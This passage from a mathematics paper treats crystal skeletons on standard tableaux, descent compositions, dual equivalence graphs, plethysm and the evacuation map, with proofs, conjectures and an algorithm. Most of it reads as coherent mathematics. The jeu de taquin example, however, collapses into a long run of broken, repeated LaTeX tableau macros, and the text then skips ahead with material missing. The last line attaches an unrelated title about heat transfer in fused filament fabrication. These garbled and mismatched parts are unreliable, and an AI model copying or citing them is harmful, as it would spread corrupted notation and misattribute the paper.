additionnal separation \(|\) before the \(i^{\rm th}\) part and/or after the \((i+1)^{\rm th}\) part, in \(\gamma^{(1)}\) and/or \(\gamma^{(2)}\): \(\begin{array}{c}\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1}|\gamma_{2}| \ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots|\gamma_{N+k}) \\ \beta\preccurlyeq\gamma^{(2)}=(\gamma_{1}|\gamma_{2}|\ldots|\gamma_{i-1}, \gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}|\ldots|\gamma_{N+k}).\end{array}\) The different decompositions into subsets of the parts in posititon \(i-1\) to \(i+1\) are given below for \(\gamma^{(1)}\), the ones for \(\gamma^{(2)}\) are equivalent. \(\gamma_{i-1}|\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}\) \(\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}\) \(\gamma_{i-1},\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}\) \(\gamma_{i-1}|\gamma_{i}|\gamma_{i+1},\gamma_{i+2}\). Therefore \(k\leq 2\). Let's now study the different possibilities, depending on the position of the cell \(i\) modified by \(f_{i}\), in relationship to the (non-maximal) horizontal bands containing the entries \(i-1,i,i+1\) and \(i+2\). As we have seen, the entries \(i\) and \(i+1\) have to be in different maximal horizontal bands, otherwise the minimal parsing is preserved by \(f_{i}\). Then the \(i\)'s appear at the end of their maximal horizontal band, and the \((i+1)\)'s, at the start of theirs. We call the specific entry \(i\) modified by \(f_{i}\) in \(T_{\gamma^{(1)}}\)_the modified entry \(i\)_. All entries considered are in \(T_{\gamma^{(1)}}\). We consider how the modification of one entry \(i\) changes the division of \(\gamma^{(1)}\) into subsets to get that of \(\gamma^{(2)}\). Recall that the head of a (non-maximal) horizontal band is its northeastmost cell, and its tail, its southwestmost cell. Case \(1:\) If the modified entry \(i\) lays on a row of index strictly smaller than that of the tail of the horizontal band of the \(i+1\)'s, and weakly greater than that of the head of the horizontal band of the \(i+1\)'s, then the divisions in the corresponding weights \(\gamma^{(1)}\) and \(\gamma^{(2)}\) are in the same positions, so we say the divisions are preserved. This is because the change of that single entry \(i\) does not interfere with the entries \(i-1\) or \(i+2\). Case \(2:\) If the modified entry \(i\) lays on a row of index weakly greater than that of the tail of the horizontal band of the \(i+1\)'s, then there are three cases to consider. * If the modified entry \(i\) is not the tail of the horizontal band of entries \(i\), then the divisions are preserved. * If the modified entry \(i\) is the tail of the horizontal band of entries \(i\), and the next entry \(i\) of the horizontal band is southwest of the head of the horizontal band of the \(i-1\)'s, then the divisions are preserved. * If the modified entry \(i\) is the tail of the horizontal band of entries \(i\), and the next entry \(i\) of the horizontal band is weakly northeast of the head of the horizontal band of the \(i-1\)'s, then if there is a division between the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts in \(\gamma^{(1)}\), then it is removed in \(\gamma^{(2)}\). All other divisions are preserved. Case 3 : If the modified entry \(i\) is weakly northeast of the head of the horizontal band of the \(i+1\)'s, then there are similarly three cases to consider. * If the modified entry \(i\) is not the head of the horizontal band of entries \(i\), then the divisions are preserved. * If the modified entry \(i\) is the head of the horizontal band of entries \(i\), and the tail of the horizontal band of the \(i+2\)'s is to its northwest, then the divisions are preserved. * If the modified entry \(i\) is the head of the horizontal band of entries \(i\), and the tail of the horizontal band of the \(i+2\)'s is weakly to its southwest, then if there is no division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts in \(\gamma^{(1)}\), then it is added in \(\gamma^{(2)}\). All other divisions are preserved. There are then very limited cases when a division is either added or removed, and otherwise divisions are preserved. Let's then consider what transitions are possible from the possible configurations of \(\gamma^{(1)}\). Let's start with the configuration \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}|\ldots| \gamma_{N+k})\). Either divisions are preserved, or the division between the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts is removed, to get either configurations below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}| \ldots|\gamma_{N+k})\ {\rm OR}\ (\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}| \ldots|\gamma_{N+k}).\] Let's now consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots| \gamma_{N+k})\). Either divisions are preserved, or the division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts can be added, to get either configurations below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}| \ldots|\gamma_{N+k})\ {\rm OR}\ (\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}| \ldots|\gamma_{N+k}).\] However, in these two cases, the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts can be summed (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retreive valid weights of smaller length, so they must be rejected. Let's now consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}|\gamma_{i+1}|\gamma_{i+2}|\ldots| \gamma_{N+k})\). Divisions can only be preserved here, to get the configuration below in \(\gamma^{(2)}\). \[(\gamma_{1}|\ldots|\gamma_{i-1},\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}| \ldots|\gamma_{N+k}).\] Similarly as for the previous configuration, the \((i-1)^{\rm th}\) and \(i^{\rm th}\) parts can be added (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retreive weights of smaller length, so this must be rejected. Let's finally consider the configuration \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}|\gamma_{i+1},\gamma_{i+2}|\ldots| \gamma_{N+k})\). Either divisions are preserved, or the division between the \((i+1)^{\rm th}\) and \((i+2)^{\rm th}\) parts is added, to get either configurations below in \(\gamma^{(2)}\). \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1,\gamma_{i+2}|\ldots| \gamma_{N+k})\) OR \((\gamma_{1}|\ldots|\gamma_{i-1}|\gamma_{i}-1|\gamma_{i+1}+1|\gamma_{i+2}|\ldots| \gamma_{N+k})\). In the first configuration above, the \((i+1)^{\text{th}}\) and \((1+2)^{\text{th}}\) parts can be added (in \(\gamma^{(1)}\) and \(\gamma^{(2)}\)) to retreive weights of smaller length, so this configuration must be rejected. The second one is valid. There are then only three possible configurations for the divisions in \(\gamma^{(1)}\xrightarrow{i}\gamma^{(2)}\), such that \(k\) is minimal and the minimal parsing is modified by \(f_{i}\), going from \(T_{\gamma^{(1)}}\) to \(T_{\gamma^{(2)}}\). What is most important for us here is to note that they force \(k=0\), and that \(|\ell(\alpha)-\ell(\beta)|\in\{0,1\}\). Note that there is a special case to consider in cases where \(\gamma_{i}=1\), with \(\gamma_{i+1}\geq 1\) or \(\gamma_{i+1}=0\). The second case is easy since then the maximal horizontal bands are preserved. In the first case, the only possible configurations are the following. \[(\gamma_{1}|\ldots|\gamma_{i-1}|1|\gamma_{i+1},\gamma_{i+2}|\ldots |\gamma_{N+k})\xrightarrow{i}(\gamma_{1}|\ldots|\gamma_{i-1},0|\gamma_{i+1}+1 |\gamma_{i+2}|\ldots|\gamma_{N+k})\text{ OR}\] \[(\gamma_{1}|\ldots|\gamma_{i-1}|1|\gamma_{i+1}|\gamma_{i+2}| \ldots|\gamma_{N+k})\xrightarrow{i}(\gamma_{1}|\ldots|\gamma_{i-1},0|\gamma_{ i+1}+1|\gamma_{i+2}|\ldots|\gamma_{N+k}).\] In the second configuration, we still get \(k=0\). In the first one, these configurations are only possible if the only entry \(i\) is northeast of both the head of the horizontal band of the \(i+1\)'s and the tail of the \(i+2\)'s (in order to break their maximal horizontal band). However, \(f_{i}\) cannot change this entry, since the corresponding parenthesis sequence (for the parenthesis rule) will give \((\ldots()\), with at least one parenthesis ( to be paired with the parenthesis ) of the entry \(i\), so \(f_{i}\) must be null and the first configurations cannot occur. Then, in all cases, \(k=0\). Therefore, if there exist a minimal edge labelled \(i\) between two subcomponents \(B(T_{\alpha})\) and \(B(T_{\beta})\), it occurs in \(B(\lambda)_{N}\) for \(N=\max(\ell(\alpha),\ell(\beta))\), and in all \(B(\lambda)_{n}\) for \(n\geq N\). Moreover, edges only occur between subcomponents associates to descent compositions which have equal length or which lengths differ only by \(1\). Now, \(B(\lambda)_{S}\) contains all tableaux of shape \(\lambda\) and filling at most \(S\). Since \(S\) is the maximal number of parts in descent compositions for \(\lambda\), then all subcomponents associated to quasisymmetric functions \(F_{\alpha}\) occur in \(B(\lambda)_{S}\), with at least one tableau (if \(\ell(\alpha)=S\)). By the above result, all minimal edges will then also occur in \(B(\lambda)_{S}\). For all \(n\geq S\), all subcomponents occur, potentially with more tableaux. For \(n<S\), then some subcomponents will be missing, but the minimal edges between occuring subcomponents will also occur by the previous result, so the obtained skeleton is the induced subgraph of \(Skeleton(\lambda)_{S}\) containing the standard tableaux with descent composition of length at most \(n\) as vertices. This gives the wanted result. \(\blacksquare\) We can define \(Skeleton(\lambda)=Skeleton(\lambda)_{S}\), where \(S\) is the maximal length of a descent composition for \(\lambda\). Then \(Skeleton(\lambda)\) is also the underlying structure of \(B(\lambda)\). It is a corollary of the proof that **Corollary 4.9**: **:** There are edges in \(Skeleton(\lambda)\) only between standard tableaux whose number of descents differ by at most 1. **Conjecture 4.10**: **:** Let \(H_{S}\) be the induced subgraphs of \(Skeleton(\lambda)\) whose vertices are the standard tableaux with descent compositions having \(s\) parts. Then \(H_{s}\) is either a * Disjoint union of singleton(s), or * Disjoint union of chain(s), or * Disjoint union of even cyle(s) with, or without, two extra attached vertices giving the source(s) and sink(s). Multiple edges occur only between such induced subgraphs associated to different descent composition lengths \(s\). This has been verified for all partitions \(\lambda\vdash m\) with \(m\leq 6\). Figure 4 illustrates different cases of the conjecture. It would be interesting to study further this notion of skeleton of crystals. In particular, Danilov, Karzanov and Koshevoy have done so, along with studying the notion of subcrystals [4], in the alternative crossing model for \(A_{n-1}\) crystals. They introduced alternate combinatorial objects as vertices of crystals, defined crystal operators on these objects by using feasible functions, and showed that this does give an alternative model for Figure 4: Structure of induced subgraphs of \(Skeleton(\lambda)\) whose vertices are standard tableaux with a fixed numer of descents \(A_{n-1}\) crystals by using Stembridge axioms. Some results may then have connections to those found here, but the vastly different setting makes comparisons difficult. It would however be extremely interesting to further study the connections with their results. Crystal skeleton and dual equivalence graphs as relations between the plactic and coplactic monoids In this section, we explore the relationship between the skeleton and the dual equivalence graphs introduced by Assaf [2], which is another oriented graph structure on standard tableaux. We will see how the fundamental quasisymmetric functions can be seen as describing the relationship between the plactic and coplactic monoid, and relations between them encode dual \(RSK\) equivalences. Let's start by recalling certain definitions. ### RSK algorithm, jeu de taquin, plactic and coplactic monoids in crystals Recall that the RSK algorithm associates to any word \(w\) a pair of tableaux \((P(w),Q(w))\). See [10] or [22] for a full description of the algorithm. The tableau \(P(w)\) is called the insertion tableau of \(w\), and will have the same weight as \(w\). The tableau \(Q(w)\) is called the recording tableau of \(w\), and is standard in this context. Words then form the plactic monoid, with concatenation as product, and Knuth relations as equivalence relations [2]. All words in the same equivalence class in the plctic monoid are mapped onto the same insertion tableaux \(P\), and its row reading word \(rw(P)\) can be seen as a representative of this Knuth-equivalence class. We will take this as the definition for words to be _plactically equivalent_. _Jeu de taquin_ allows, among other things, to translate Knuth relations (of the plactic monoid on words) to tableaux, and to describe a crystal structure on skew tableaux: tableaux on shapes \(\lambda/\mu\), where the cells of \(\mu\) are blanks in \(\lambda\), and other cells are filled with the usual row and column conditions. Its effect on these skew tableaux then corresponds to applying the Knuth relations to the associated reading words. Starting with a skew tableau, blanks pass through non-empty cells, always preserving conditions on rows and columns. A jeu de taquin slide always starts at an inner corner, having non-empty cells to its right and under it, exchanging it successively with non-empty cells until it lies on the outer shape of \(\lambda\) and no more exchanges are possible. Doing this process recursively allows one to "rectify" the tableau to a partition shape. This tableau is called the _rectification_ of the initial skew tableau. The rectification is unique, so the order of the slides doesn't matter. For example, the skew tableau \(T\) below, of skew shape \((5,5,3)/(2,2)\), is rectified in five jeu de taquin slides, where the inner corners used for the slides are identified by red cells, and the entries moved in the slide appear in red: \[T=\youngyoung{\young{\young{\young{\young{\young{\young{\young{\young{\young{\young{ \young{\young{\young{\young{\young{\young{\youngyoung{\youngyoungyoung{\youngyoungyoung{\youngyoungyoung{\youngyoungyoung{ \young All words with the same recording tableau \(Q(w)\) are said to be coplactically equivalent (in the associated coplectic monoid). They all land in the same connected crystal. In particular, coplectic equivalences preserve descents by the above proposition. ### Relation between plactic and coplectic monoids: skeleton and dual equivalence graphs The relation between plactic and coplectic classes is illustrated by the well known fact that if \(RSK(w)=(P(w),Q(w))\), then \(RSK(w^{-1})=(Q(w),P(w))\) (see Theorem 10.112 of [11]). This correspondence works for any word, not only permutations, by using the \(RSK\) map on biwords, where the inverse of a biword is easily computed. In this context, the recording tableau \(Q(w)\) may be semistandard. This can then be understood by linking standard tableaux of shape \(\lambda\vdash m\) indexing connected crystal components \(B(\lambda)\) in \([n]^{\otimes m}\), and the associated subcomponents of \(B(\lambda)\). They can be seen as the inverse images of the relation in RSK, exchanging the \(P,Q\)-tableaux as the effect of considering \(w^{-1}\): standard tableaux expand into their associated subcomponent as the subcomponents shrink to their associated standard tableau, respectively under destandardization in all posssible ways which preserve the minimal parsing, and standardization. The fundamental quasisymmetric functions \(F_{\alpha}\) and their associated subcomponents can then be seen as representing the relation between plactic and coplectic classes. This new interpretation of these relationships establishes additional relations between connected components \(B(\lambda)\) in the tensor \(B(1)^{\otimes m}\). Other interesting relations are often referred to as _dual RSK relations_: equivalences, generally on permutations, with the following elementary transformations on letters \(i-1\), \(i\) and \(i+1\) in a permutation, according to their relative positions: \[\begin{array}{cccccc}i&i+1&i-1&\xleftrightarrow{i}&i-1&i+1&i\\ i&i-1&i+1&\xleftrightarrow{i}&i+1&i-1&i\end{array}\] Note that these elementary transformations do not correspond to coplectic relations, in particular since they introduce (or remove) descents. Assaf introduced dual equivalence graphs to represent these dual RSK relations on permutations as actions on the standard tableaux with these permutations as reading words [20]. They are then graphs on standard tableaux, just like our skeleton of crystals. Even though they are defined very differently, these two types of oriented graph structures on standard tableaux are surprisingly similar. The associated dual graph for \(\lambda=(4,3)\), as defined by Assaf, would be the one illustrated in figure 5. Its graph structure only differs from that of figure 3 by seven edges missing. Franco Saliola suggested the dual equivalence graph for \(\lambda\) is a subgraph of \(Skeleton(\lambda)\). We conjecture further that **Conjecture 5.3 :** The dual equivalence graph for \(\lambda\) is a subgraph of \(Skeleton(\lambda)\), in the sense that, forgetting orientations and labels, if there are \(r\) two sided arrows between two standard tableaux in the dual equivalence graph, there are also \(r\) edges between the same standard tableaux in \(Skeleton(\lambda)\). Moreover, if \(Skeleton(\lambda)\) has \(r>1\) edges between two standard tableaux, then there are \(r\) edges between the same standard tableaux in the dual equivalence graph for \(\lambda\). This conjecture has been verified for all partitions \(\lambda\vdash m\) with \(m\leq 6\). We also note that most of the time the two graph structures are equal. The skeleton would then encode the dual RSK equivalences (among other relations) on standard tableaux. Note that the reading word of all tableaux with same minimal parsing standardize to the same permutation, as noted in example 1.5. All these tableaux correspond to the vertices of a subcomponent \(B(T_{\alpha})\), mapped onto \(std(T_{\alpha})\) in the skeleton. We can then see the skeleton as encoding relations between permutations (reading words of the standard tableaux). However, the fact that these relations are generally dual RSK equivalences is surprising. ## 6 Applications to plethysm ### Counting monomials in plethysms \(s_{\mu}[s_{\lambda}]\) As discussed in the introduction, plethysms of two Schur functions \(s_{\mu}[s_{\lambda}]\) have a decomposition in the basis of fundamental quasisymmetric functions [10]: \[s_{\mu}[s_{\lambda}]=\sum_{A\in S_{a,b}(\mu,\lambda)}F_{Asc(A)}.\] Figure 5: Dual equivalence graph for \(\lambda=(4,3)\), as of the definition of Assaf [2]. In this formula, \(\mu\vdash a\), \(\lambda\vdash b\), \(S_{a,b}(\mu,\lambda)\) is a set of \(a\times b\)'standard' matrices which depend on the shapes \(\mu\) and \(\lambda\), and \(Asc(A)\) gives a composition giving the ascents of the word read off the matrix \(A\) under a complex reading order. The matrices are built from what Loehr and Warrington call tableaux of tableaux: entries of the tableau of shape \(\mu\) are tableaux of shape \(\lambda\). We then say they have _shape_\(\lambda^{\mu}\). When a total order on tableaux is fixed, the tableaux of tableaux of shape \(\lambda^{\mu}\) give the monomials of \(s_{\mu}[s_{\lambda}]\) (see for example [De Boeck et al., 2021], [Loehr and Warrington, 2012], [Stanley and Fomin, 1999], etc.). One definition of plethysm is in terms of the variable substitution of the \(x_{1},x_{2},\ldots\) in \(s_{\mu}\) by the monic monomials of \(s_{\lambda}\) (monomials with coefficient \(1\)). Monomials with coefficients \(c\in\mathbb{N}\) greater than \(1\) are simply broken down into \(c\) monic monomials. Since both functions in the plethysm are Schur functions (so symmetric), then the order of the monomials is not important, and the concept of tableaux of tableaux makes perfect sense. By using the results above, we have that **Corollary 6.1 :** The number of monic monomials in a plethysm \(s_{\mu}[s_{\lambda}(x_{1},\ldots,x_{n})]\) is equal to \(|SSYT(\mu)_{|SSYT(\lambda)_{n}|}|\). Proof.: One need only consider the plethystic substitution of the monic monomials of the Schur function \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\) into \(s_{\mu}\). ### Decomposing a symmetric sum of quasisymmetric functions into the basis of Schur functions Since plethysms are symmetric, and the plethysm of two Schur functions can be expressed as a symmetric sum of fundamental quasisymmetric functions, giving a combinatorial description of the passage from this expression to one in the Schur basis might help make progress on plethysm problems. If \(f\) is a symmetric function with decomposition into the basis of quasisymmetric functions \(f=\sum d_{\alpha}F_{\alpha}\), we can replace the \(F_{\alpha}\) by generalized Schur functions \(s_{\alpha}\), defined using the Jacobi-Trudi definition on determinants, with the same coefficients [Garsia and Remmel, 2018]. A generalized symmetric function \(s_{\alpha}\) is equal to \(\pm s_{\lambda}\), for some partition \(\lambda\). Then a lot of generalized Schur functions cancel out, so this is far from efficient. For a symmetric \(f=\sum d_{\alpha}F_{\alpha}\), another way to express it in the Schur basis is through multiple changes of basis: fundamental quasisymmetric functions to monomial quasisymmetric functions to monomial symmetric functions to Schur functions. This is computationally faster, so this is the algorithm implemented in SageMath. However, this doesn't give much insight into the relationship between the two basis which truely interests us. We can then use the results above to give another way of expressing a symmetric function (given in terms of fundamental quasisymmetric functions) into the basis of Schur functions. **Proposition 6.2 :** Let \(f\) be a symmetric function which admits a decomposition \(f=\sum_{\beta}c_{\beta}F_{\beta}\) into the basis of fundamental quasisymmetric functions. Let \(\alpha\) be the maximal descent composition appearing in the decomposition of \(f\) for the lexicographical order. Then \(\alpha\) is a partition, \(f-c_{\alpha}s_{\alpha}\) is Schur-positive and \(F\)-positive. _Proof_. Since \(f\) is symmetric, it must admit a (unique) decomposition into the basis of Schur function. We have seen in proposition 2.4 that the partitions \(\lambda\) such that \(F_{\alpha}\) can appear in \(s_{\lambda}\) must have \(\lambda_{1}\geq\alpha_{i}\), so in particular \(\lambda_{1}\geq\alpha_{1}\). We must also have that \(\lambda_{1}+\lambda_{2}+\ldots+\lambda_{j}\geq\alpha_{1}+\alpha_{2}+\ldots+ \alpha_{j}\) for all \(j\), so \(\alpha\leq_{lex}\lambda\), with \(\leq_{lex}\) the lexicographical order. If \(s_{\lambda}\) appears in \(f\), then \(F_{\lambda}\) must appear in the decomposition of \(f\) in the basis of quasisymmetric functions. This is because \(s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{compDes(T)}\), and \(\lambda\) is the descent composition of the standard tableau often refered as the _superstandard tableau_, which has destandardization (according to its minimal parsing) \(1_{\lambda}\). Since we have picked \(\alpha\) maximal for the lexicographical order in all descent compositions appearing in the decompositions of \(f\), then \(c_{\gamma}=0\) for all \(\gamma>_{lex}\alpha\). We must then have that \(\alpha=\lambda\) is a partition, \(s_{\alpha}\) appears \(c_{\alpha}\) times in the decomposition of \(f\) in the basis of Schur functions, and so \(f-c_{\alpha}s_{\alpha}\) is symmetric and has a decomposition in the basis of fundamental quasisymmetric functions with only positive coefficients. **Corollary 6.3 :** The following algorithm gives the decomposition of a symmetric function \(f\), expressed in the basis of fundamental quasisymmetric functions, into the Schur basis. **Algorithm 6.4 :** Let \(f\) be a symmetric function with an expression in the basis of fundamental quasisymmetric functions \(f=\sum_{\beta}c_{\beta}F_{\beta}\). Let \(S=f\), and reset \(f=0\). 1. Let \(\alpha\) be the leading support, ie the largest descent composition appearing in \(S\) for the lexicographical order. It must be a partition. 2. Let \(S=S-c_{\alpha}\left(\sum_{T\in SYT(\alpha)}F_{compDes(T)}\right)\) and \(f=f+c_{\alpha}s_{\alpha}\). 3. Repeat until \(S=0\). Then \(f\) is expressed in the basis of Schur functions. **Remark 6.5 :** This algorithm is rather simple and straightforward from the definitions, so others may have used it before. However, it seems to be absent from the literature. Its underlying construction is its most important interest, as it is generally not more efficient than the algorithm implemented in SageMath (when computing the decomposition of a random symmetric sum of quasisymmetric functions of degree \(n\) into the Schur basis). Maybe plethysm is even more closely related to fundamental quasisymmetric functions than we thought. **Remark 6.6 :** This algorithm may explain the result of De Boeck, Paget and Wildon, stating that a Schur function \(s_{\nu}\) occurs in a plethysm \(s_{\mu}[s_{\lambda}]\) with multiplicity given exactly by the number of _maximal plethystic tableaux of weight_\(\nu\) if and only if \(\nu\) is maximal for the lexicographical order for \(\mu,\lambda\)[De Boeck et al., 2021]. Maximal here indicates that no entry \(c\) of a tableau-entry can be changed for an entry \(c-1\) without breaking the condition of the larger tableau being semistandard. ## Conclusion We now have a better understanding of the decomposition of Schur functions into quasisymmetric functions, and of the relationships between them. We may now use this to find a more direct expression of the plethysm of two Schur functions into the basis of Schur functions. ## Aknowledgement I thank Franco Salioa for his support throughout this project. I also thank those who contributed to SageMath, which helped test examples and generate figures, and those behind OEIS, which helped formulate proposition 3.6. FMG received funding from NSERC. Annex: Proofs for EVAC We give here a proof that the evacuation map EVAC defined in section 4 is an anti-automorphism of crystals. We also give a proof that it inverses descent compositions. Berenstein and Zelevinsky proved the former in [Berenstein and Zelevinsky, 1996], but their proof uses a lot of tools of crystal theory and representation theory. We believe our proof to be of interest, since it can be more accessible, and also uses an anti-automorphism of crystals on words \(Rot\) studied already in the litterature: for \(w=w_{1}w_{2}\ldots w_{k}\in[n]^{\otimes k}\), \[Rot(w)=\mbox{compl}(w_{k}\ldots w_{2}w_{1})=\bar{w_{k}}\ldots\bar{w_{2}}\bar{w _{1}},\] where \(\bar{\ell}=compl(\ell)=n-\ell+1\). The operator \(Rot\) was studied by Poirier and Reutenauer in [Poirier and Reutenauer, 1995]. They showed that \(Rot(w)=w_{0}ww_{0}\), where \(w_{0}=k(k-1)\ldots 321\) is the longest permutation of the symmetric group \(\mbox{S}_{k}\), for \(k\) the length of \(w\). \(ww_{0}\) is the mirror image \(w\), and \(w_{0}w\) changes letters \(i\) of \(\overleftarrow{w}\) into \(k-i+1\). If \(w\) is not a permutation, we can standardize \(w\) according to its weight \(\beta\) from left to right, and afterwards de-standardize it according to \(\stackrel{{\leftarrow}}{{\beta}}\), from right to left. We then get the same effect on \(w\) as \(Rot\). We then have that **Proposition A.1 :**\(Rot\) is an anti-automorphism of crystals of words which inverses descent compositions. Proof.: We have that \(Rot\) is an involution, so we have an automorphism. We need to show that \(Rot(f_{i}(w))=e_{n-i}(Rot(w))\) for any word \(w\). By definition, \(Rot(w)=\bar{w_{k}}w_{k-1}^{-}\ldots\bar{w_{2}}\bar{w_{1}}\) where \(\bar{w_{i}}=n-w_{i}+1\). Suppose entries \(i\) and \(i+1\) give a certain sequence of unpaired parenthesis \()^{\phi_{i}}(^{\epsilon_{i}}\). Then \(Rot(w)\) has the sequence \()^{\epsilon_{i}}(^{\psi_{i}}\) for entries \(n-i\) and \(n-i+1\), where entries \(n-i+1\) are obtained from letters \(i\) in \(w\), and letters \(n-i\), from letters \(i+1\) in \(w\). The letter \(i\) affected by \(f_{i}\) in \(w\) corresponds then to the letter \(n-i+1\) affected by \(e_{n-i}\) in \(Rot(w)\). Then \(Rot(f_{i}(w))=e_{n-i}(Rot(w))\). Now descent compositions have been described as the lengths of the minimal parsing of words \(w\) into weakly increasing factors. If a word \(w\) has minimal parsing of lengths \(\alpha\), then reversing the order of the letters gives weakly increasing sequences of lengths \(\overleftarrow{\alpha}\), and complementing letters gives back weakly increasing sequences of lengths \(\overleftarrow{\alpha}\). Then \(Rot\) inverses descent compositions. Let's denote by \(B_{\lambda}(w)\) the crystal (on words) which has source \(w\), of weight \(\lambda\). Then \(B_{\lambda}(w)\simeq B(\lambda)_{n}\) by proposition 1.6. **Remark A.2 :** It is possible to show that crystal operators preserve descent compositions on words [Appleby and Whitehead, 2020], so the fact that \(Rot\) inverses descent compositions of words implies that the image of a connected component crystal of words \(B_{\lambda}(w)\), under the \(Rot\) map, is the (dual) isomophic connected component of crystal of words \(B_{\lambda}(w)^{\#}\), obtained by reversing arrows directions, re-labelling arrows \(i\) by \(n-i+1\), and vertices \(v\) by \(Rot(v)\). In particular, if \(w\) is a Yamanouchi word (the source of a connectd component \(B_{\lambda}(w)\)), then \(Rot(w)\) is an anti-Yamanouchi word, with \(f_{i}(Rot(w))=NULL\)\(\forall i\), and the sink of \(B_{\lambda}(w)^{\#}\). These two components are isomorphic to the same \(B(\lambda)\), so the sources and sinks of both will map respectively on \(1_{\lambda}\) and the sink of \(B(\lambda)\), which will be EVAC(\(1_{\lambda}\)). We can now use the correspondence given by Poirier and Reutenauer to see how this \(Rot\) map affects the \(RSK\) insertion. Since \(Rot(w)=w_{0}ww_{0}\), then \(RSK(Rot(w))=RSK(w_{0}ww_{0})\). **Proposition A.3 ([Chmutov et al., 2022]) :**\(RSK(w_{0}ww_{0})=(\text{EVAC}(P(w)),\text{EVAC}(Q(w))\). We can finally can show that EVAC is an anti-automorphism of crystals of tableaux, by using only the results above. **Proposition A.4 :** EVAC is an anti-automorphism of crystals of tableaux, when considering vertices as pairs of tableaux \((P,Q)\) with \(Q\) standard obtained through \(RSK\). Proof.: First off, lets note that EVAC(\(Q\)) is a standard tableau which indexes an isomorphic connected component of crystals of tableaux. Then pairs \((P,\text{EVAC}(Q))\) are the vertices of this isomorphic connected component, for all \(P\) appearing in the first connected component. All tableaux \(P\) of shape \(\lambda\) appear in \(B(\lambda)_{n}\). Since the involution EVAC sends a tableau of shape \(\lambda\) onto another tableau of the same shape, then it is an auto(iso)morphism on \(B(\lambda)_{n}\). If \(w\) is Yamanouchi, it is sent onto \((1_{\lambda},Q(w))\) through \(RSK\), and \(Rot(w)\) is sent onto \((\text{EVAC}(1_{\lambda}),\text{EVAC}(Q(w)))\). EVAC(\(1_{\lambda}\)) is then the sink of \(B(\lambda)_{n}\), by the above remark. If \(v=f_{i_{1}}f_{i_{2}}\ldots f_{i_{\ell}}(w)\), for \(w\) the Yamanouchi word which is the source of the connected component of the crystal of words in which lies \(v\), then \[RSK(Rot(v)) =RSK(Rot(f_{i_{1}}f_{i_{2}}\ldots f_{i_{\ell}}(w)))\] \[=RSK(e_{n-i_{1}}e_{n-i_{2}}\ldots e_{n-i_{\ell}}(Rot(w))\] \[=(e_{n-i_{1}}e_{n-i_{2}}\ldots e_{n-i_{\ell}}(\text{EVAC}(1_{ \lambda})),\text{EVAC}(Q(w))),\] where the crystal operators are either those on words or on tableaux depending on the object they apply to. The fact that \(RSK\) commutes with crystal operators, going from second equality to the third, follows from proposition 5.1. We then have that \(\text{EVAC}(f_{i}(P))=e_{n-i}(\text{EVAC}(P))\), and that EVAC is a crystal anti-automorphism. **Proposition A.5 :** EVAC inverses descent compositions of tableaux: if \(DesComp(T)=\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\), then \(DesComp(\text{EVAC}(T))=\overset{\leftarrow}{\alpha}=(\alpha_{s},\ldots, \alpha_{2},\alpha_{1})\). Proof.: We have seen in section 5 that a word \(w\) and its recording tableau \(Q(w)\) share the same descent composition, and that \(RSK(w^{-1})=(P(w^{-1}),Q(w^{-1}))=(Q(w),P(w))\). For a fixed tableau \(T\), if \(rw(T)=w\), then \(w^{-1}\) and \(P(w)=T\) share the same descent composition. We have also seen that \(RSK(Rot(w))=(\text{EVAC}(P(w)),\text{EVAC}(Q(w)))\), so \[RSK(Rot(w)^{-1}) =(\text{EVAC}(Q(w)),\text{EVAC}(P(w)))\] \[=RSK(Rot(w^{-1})).\] Then \(Rot(w^{-1})\) and \(\text{EVAC}(P(w))=\text{EVAC}(T)\) share the same descent composition. Finally, since \(Rot\) inverses descent compositions on words, then if the descent composition of \(w^{-1}\) and \(P(w)=T\) is \(\alpha\), then the descent composition of \(Rot(w^{-1})\) and \(\text{EVAC}(T)\) is \(\overset{\leftarrow}{\alpha}\). Figure 6: Bijection between connected components isomorphic to \(B(\mu)\) which are linked by the anti-automorphisms \(Rot\) and EVAC, and the isomorphism of crystals \(RSK\), with \(\text{EVAC}(Q(w))=Q(w^{\prime})\) and \(w^{\prime}=RSK^{-1}(1_{\mu},\text{EVAC}(Q(w)))\).
2305.03455
Efficient simulation of the heat transfer in fused filament fabrication
